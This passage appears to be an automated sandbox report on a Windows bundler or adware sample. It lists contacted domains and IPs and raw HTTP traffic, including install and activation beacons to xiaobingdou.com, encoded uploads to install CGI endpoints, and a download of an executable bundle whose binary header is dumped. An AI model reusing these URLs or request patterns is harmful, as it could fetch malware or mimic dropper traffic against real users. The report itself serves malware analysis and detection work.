.rsrc	225280	48696	49152	4.32483	23edce385f432ed492f596e7da74f1f9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://xiaobingdou.com/anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDM0QTgwQkI4OUI1QTIxODYwRjFBQjM1RjIwMThCOUYyMTkzQjZFODExM0U2MENDMjc5NERDNDQwM0EzNzVGNzZCODJCODdDRUJGMkEwNUEwQjU4MDVBMzYxRjE5QkFBRkY=	23.88.167.250
hxxp://int.dpool.sina.com.cn/iplookup/iplookup.php	180.149.136.219
hxxp://xiaobingdou.com/anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDMzMUQzQ0VBQTM1RUNEMDQ2MkQ0Q0Q3MjA5QzgzMTI2NzUwN0E1M0FGRkQ4RjlEMTk1OTVDNDg1MDUwMTkwMEFGNDc2OTBGOUUzMUU3NTREMTE3RkJBM0I4RDA0NkE5QjA=	23.88.167.250
hxxp://xiaobingdou.com/jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNDlERjNDNUIyNjgwNjZGRDczQzBCMjQzQjg2RTMzNUIxMkYwQzU4NzY3NzQxQTNDNjc3MEM4M0JFRjlEMkZCNUEyRDA1RTU0OThBQ0Q2QTg2NjlDRTkyMDEyMjkwNzg5	23.88.167.250
hxxp://xiaobingdou.com/online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY=	23.88.167.250
hxxp://wsxc123.cc/open/51486.ini	23.82.46.34
hxxp://wsxc123.cc/Setup/51486_a.xml	23.82.46.34
hxxp://xiaobingdou.com/reportInstall.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNTEyM0U1Q0FDODhFRjdFN0MxNEE5NkY3NzMxQUNEQTY5RTY0MTEwOEI5MDkyQzg5ODE1NDcxQTQwMUFBRkYxRTFBRDFBOTYyMkZBRkVBMzI4MERBQUNDQ0Y2MTk3OUY3NjRFM0FGNzZFMzc4M0Q1MjJBM0YyRDMzNTBEMDY4MjI=	23.88.167.250
hxxp://xiaobingdou.com/begin.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczRjUxNUI4REIxM0Q4OUQ2MEIzMUM2RTQ4NDU4MkI2MjREOTVFRjI5QTQ0NTg0OUYwNjgyRkVFQjdFMkU4OTNFMg==	23.88.167.250
hxxp://wsxc123.cc/offer/YeaPlayer_br_IBD_Bundle.exe	23.82.46.34
hxxp://xiaobingdou.com/jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGQzc4RjI1RDExOEU4MTVCNERBQzVDRjM5MEMzMjlCMDM3RTBERTg3QjA3NTQ2ODMyRTQ1NjUyQjkxQzNFQkUyNDJEQTgyMjJCMDJFNzk5Q0Y5MkI2MTE0MTMwNjhBRDBDQkE5RDRGQ0ExMUNFOTc5RUNGRkYwRkE1NUU3QzU2N0ZCOTc0QzA5MjgwNzkzQ0FBMDBFNjk2OUI3NTdBMUFF	23.88.167.250
hxxp://xiaobingdou.com/down.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMEIwNkU4RDJCMTk4QUU0QUNBQkQxQzM1RTA0QzVBQzU=	23.88.167.250
hxxp://xiaobingdou.com/fail.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMTdCQzQ1MjI5QjNCODhBNTgzRjExRTk3NzFBOTRCMUE=	23.88.167.250
hxxp://xiaobingdou.com/xiezai.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY4QzMwQkJBRUIwNzA1QTEyNzBDM0RFQTk1OTJDN0ZCMzdDQTY3QzRGN0I0RDA2NDAzMzc0M0IyRTYzQjk0OTY=	23.88.167.250
hxxp://tools-uplog-626660929.us-east-1.elb.amazonaws.com/cgi-bin-py/weather_install.cgi
hxxp://download.toptools100.com.cdngc.net/yeaplayer_br.encrypt
hxxp://com.alibaba.img.cdngc.net/CalendarTool_Setup_En_pure_Release_calendarbase[2015-12-25.16.42].exe
hxxp://tools-uplog-626660929.us-east-1.elb.amazonaws.com/cgi-bin-py/calendar_install.cgi
hxxp://www.theadvancedcalendar.com/cgi-bin-py/calendar_install.cgi	107.23.49.142
hxxp://download.intechnical.online/CalendarTool_Setup_En_pure_Release_calendarbase[2015-12-25.16.42].exe	37.29.13.33
hxxp://www.thedesktopweather.com/cgi-bin-py/weather_install.cgi	107.23.49.142
hxxp://down.hejie123.com/offer/YeaPlayer_br_IBD_Bundle.exe	107.167.14.130
hxxp://download.thedesktopweather.com/yeaplayer_br.encrypt	37.29.13.53
rtp.tools1000.com	52.4.87.212

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 500 Internal Server Error

Connection: close

Date: Tue, 03 May 2016 01:55:56 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 3030

<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... &lt

<<< skipped >>>

GET /yeaplayer_br.encrypt HTTP/1.1

User-Agent: HTTP_CLIENT

Host: download.thedesktopweather.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 03 May 2016 01:56:00 GMT

Server: PWS/8.1.36

X-Px: ms h0-s1157.v0-mow ( h0-s1063.v0-mow), ms h0-s1063.v0-mow ( h0-s75.p51-icn), ht-d h0-s75.p51-icn.cdngp.net

ETag: "769c03b-f6-529cfae03b180"

Cache-Control: max-age=604800

Expires: Thu, 05 May 2016 20:26:06 GMT

Age: 365394

Content-Length: 246

Content-Type: text/plain

Last-Modified: Thu, 21 Jan 2016 03:27:18 GMT

Connection: keep-alive

............HCT.......................................................................................................................................................................................................................................HTTP/1.1 200 OK..Date: Tue, 03 May 2016 01:56:00 GMT..Server: PWS/8.1.36..X-Px: ms h0-s1157.v0-mow ( h0-s1063.v0-mow), ms h0-s1063.v0-mow ( h0-s75.p51-icn), ht-d h0-s75.p51-icn.cdngp.net..ETag: "769c03b-f6-529cfae03b180"..Cache-Control: max-age=604800..Expires: Thu, 05 May 2016 20:26:06 GMT..Age: 365394..Content-Length: 246..Content-Type: text/plain..Last-Modified: Thu, 21 Jan 2016 03:27:18 GMT..Connection: keep-alive..............HCT.........................................................................................................................................................................................................................................

POST /jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGQzc4RjI1RDExOEU4MTVCNERBQzVDRjM5MEMzMjlCMDM3RTBERTg3QjA3NTQ2ODMyRTQ1NjUyQjkxQzNFQkUyNDJEQTgyMjJCMDJFNzk5Q0Y5MkI2MTE0MTMwNjhBRDBDQkE5RDRGQ0ExMUNFOTc5RUNGRkYwRkE1NUU3QzU2N0ZCOTc0QzA5MjgwNzkzQ0FBMDBFNjk2OUI3NTdBMUFF HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 200 OK

Connection: close

Date: Tue, 03 May 2016 01:55:58 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Length: 0

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 500 Internal Server Error

Connection: close

Date: Tue, 03 May 2016 01:55:55 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 3030

<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... &lt

<<< skipped >>>

POST /jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNDlERjNDNUIyNjgwNjZGRDczQzBCMjQzQjg2RTMzNUIxMkYwQzU4NzY3NzQxQTNDNjc3MEM4M0JFRjlEMkZCNUEyRDA1RTU0OThBQ0Q2QTg2NjlDRTkyMDEyMjkwNzg5 HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 200 OK

Connection: close

Date: Tue, 03 May 2016 01:55:51 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Length: 0

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 500 Internal Server Error

Connection: close

Date: Tue, 03 May 2016 01:55:51 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 3030

<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... &lt

<<< skipped >>>

POST /fail.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMTdCQzQ1MjI5QjNCODhBNTgzRjExRTk3NzFBOTRCMUE= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 200 OK

Connection: close

Date: Tue, 03 May 2016 01:55:59 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Length: 0

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 500 Internal Server Error

Connection: close

Date: Tue, 03 May 2016 01:55:53 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 3030

<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... &lt

<<< skipped >>>

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 500 Internal Server Error

Connection: close

Date: Tue, 03 May 2016 01:55:54 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 3030

<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... &lt

<<< skipped >>>

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 500 Internal Server Error

Connection: close

Date: Tue, 03 May 2016 01:55:52 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 3030

<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... &lt

<<< skipped >>>

POST /cgi-bin-py/weather_install.cgi HTTP/1.1

Content-Type: multipart/form-data; boundary=6F9B7B0CEF0C4cfbA767D8D91B5F4982

User-Agent: HTTP_CLIENT

Host: VVV.thedesktopweather.com

Content-Length: 430

Connection: Keep-Alive

--6F9B7B0CEF0C4cfbA767D8D91B5F4982

Content-Disposition: form-data; name="ufile01"; filename="boundary"

Content-Type: application/octet-stream

/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E

.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.zx.N78.9?.P(. ..k$.X&T.v(..x.lH. (..7..1x.Hg. ..h~.R7).1=..(.3=1E38566

--6F9B7B0CEF0C4cfbA767D8D91B5F4982--

HTTP/1.1 200 OK

Content-Type: text/plain

Date: Tue, 03 May 2016 01:56:00 GMT

Server: Apache

Content-Length: 7

Connection: keep-alive

success....

POST /cgi-bin-py/weather_install.cgi HTTP/1.1

Content-Type: multipart/form-data; boundary=C5252C36FEFA4de894DB8DCC11B86612

User-Agent: HTTP_CLIENT

Host: VVV.thedesktopweather.com

Content-Length: 425

Connection: Keep-Alive

--C5252C36FEFA4de894DB8DCC11B86612

Content-Disposition: form-data; name="ufile01"; filename="boundary"

Content-Type: application/octet-stream

/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E

.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.zx.N78.9?.P(. ..k$.X&T.v(..x.lH. (..7..1x.Hg. ..h~.R7D.)'=1E38566

--C5252C36FEFA4de894DB8DCC11B86612--

HTTP/1.1 200 OK

Content-Type: text/plain

Date: Tue, 03 May 2016 01:56:00 GMT

Server: Apache

Content-Length: 7

Connection: keep-alive

successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 2016 01:56:00 GMT..Server: Apache..Content-Length: 7..Connection: keep-alive..success....

POST /cgi-bin-py/weather_install.cgi HTTP/1.1

Content-Type: multipart/form-data; boundary=2F3412807F844ce0BD3A3602E56090DD

User-Agent: HTTP_CLIENT

Host: VVV.thedesktopweather.com

Content-Length: 474

Connection: Keep-Alive

--2F3412807F844ce0BD3A3602E56090DD

Content-Disposition: form-data; name="ufile01"; filename="boundary"

Content-Type: application/octet-stream

/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E

.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.t}.L,...)..e.*..!(..oT.;-..e.*-.rg.SaL.dx.Hz.<..oD.M&T.v)...`..~(..1...P(Ll^.os.EaL.05..f./..}c.I0..v'.=1E38566

--2F3412807F844ce0BD3A3602E56090DD--

HTTP/1.1 200 OK

Content-Type: text/plain

Date: Tue, 03 May 2016 01:56:03 GMT

Server: Apache

Content-Length: 7

Connection: keep-alive

successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 2016 01:56:03 GMT..Server: Apache..Content-Length: 7..Connection: keep-alive..success..

POST /begin.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczRjUxNUI4REIxM0Q4OUQ2MEIzMUM2RTQ4NDU4MkI2MjREOTVFRjI5QTQ0NTg0OUYwNjgyRkVFQjdFMkU4OTNFMg== HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 200 OK

Connection: close

Date: Tue, 03 May 2016 01:55:54 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Length: 0

GET /Setup/51486_a.xml HTTP/1.0

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: wsxc123.cc

Accept: */*

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/xml

Last-Modified: Tue, 19 Apr 2016 09:49:48 GMT

Accept-Ranges: bytes

ETag: "0466bcf209ad11:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Tue, 03 May 2016 01:55:49 GMT

Connection: keep-alive

Content-Length: 35506

#ws.........................................................................)pu)Kv$qc(wz*Bd$A\ f[)Co)wz$sS*[z%[x#p@)AY(qA*cg k^.......................)us)]F)wz$sS f[)Co%wT$bh aE)rI VH*[z%[x#p@)AY(qA*cg k^...........*E_)pL$bm$xu q])QL..............#pV(tG$qq%_r*Bi............#pV)jN*RP%PL$jM(tG$qq VH*ZK(wz*Tc%LV$sK Nu)Kw............(ta VH(tL(tf%_r*Bi(tG$qq#p@*ah)hH*{w)Fl.... VH.....)\A........$sW dG)\A.......#pV$qc(wz)bE$oI)\A#pD dG)vC)^@)FS$Oq(ta*Tr hv VH)\A#pE................)bE$oI*dm)pC....#pV....)@I.........$Kf)bV(uE)bE$oI%LV$sK Nu)Kw...)IO xl#p@(pV)DW)wv*Z| VH$sW dG$sW$m@)bE$oI#p@)bE$oI*[z(tA*lu*Ab*Z|)DW)wv VH$sW dG)Ci*SH#p@$L@*Tc%LV$sK f[)Co)\A*Er)D| Wb*lK f[)Co....#pV$Kf)bV(uE)bE$oI%LV$sK Nu)Kw...)IO xl#p@(tB.(tA)\@ VH*Tc(tA(pV)DW)wv*Z| VH$sW dG)bE$oI#p@%LV$sK........)DW)wv VH$sW dG)Ci*SH*Er)D| Wb*lK f[)Co......$Kf)bV(uE)bE$oI#p@%LV$sK Nu)Kw Y@%Qn*@E%^b$sW$m@(tG(tL*ai#p@%LV$sK f[)Co*lK%nT*Si*Er Wb*lK f[)Co....#pV....)bE$oI)@I#p@%QU%wT)bE$oI..............................)jN*RP*tl%M_..)Pd)D[$md(ta#p@)DU%wT$bh(tA*Gq)@I........)Dh*Za .w wS%K@*Tc)\j)aT)Pd Wb*lK$qc(wz......)Dh*Za*Zu)pC...$qc(wz)At$qq)D[$md...*@K)bV*.d)J@$md..#pV(tw%my.....)I.%Xb)a[ `j(t~..............................................................................................................................................................................................*CC$s|*QL*c^$qc(wz$sW dG)D[$md.................................. Ur)vj*QL*c^)Wq%UI ED...........................................................................................

<<< skipped >>>

GET /offer/YeaPlayer_br_IBD_Bundle.exe HTTP/1.0

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: down.hejie123.com

Accept: */*

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Tue, 19 Apr 2016 08:58:04 GMT

Accept-Ranges: bytes

ETag: "0764a95199ad11:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Tue, 03 May 2016 01:55:52 GMT

Connection: keep-alive

Content-Length: 600312

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.*.%.y.%.y.%.y.].y.%.y.].y.%.y.].y9%.y...y.%.y.%.y.%.y.].y.%.y.w.y.%.y.].y.%.yRich.%.y................PE..L...Z.gV.................X..........i........p....@..........................`............@..........................................P..............0...............ps..............................8...@............p...............................text....V.......X.................. ..`.rdata..V....p.......\..............@..@.data...|?..........................@....rsrc........P......................@..@.reloc..V@.......B..................@..B........................................................................................................................................................................................................................................................................................................................................................3........t.5 .....t...5 .........t...5 .........t...5 .........t...5 .........t...5 .........t...5 .........t...5 ...........8E.A........u......3.3...v$W..$......<13..........3...8E.A;.r._.......SU.l$ .E.V..3.W.F......N..~..X..t$..L$ ..._D...~..r..?.G.P.'......@..G........E...........3..D$ ............. ..D$...... ..D$...... .._..D$..;u.v..4....}..r..E....E...02O..T$.....K.;E.v.......}..r..M....M..D$..T$......2O......;E.v.......}..r..M....M..D$..T$......2O.....K.;E.v.......}..r..M....M..D$......2O.....K.

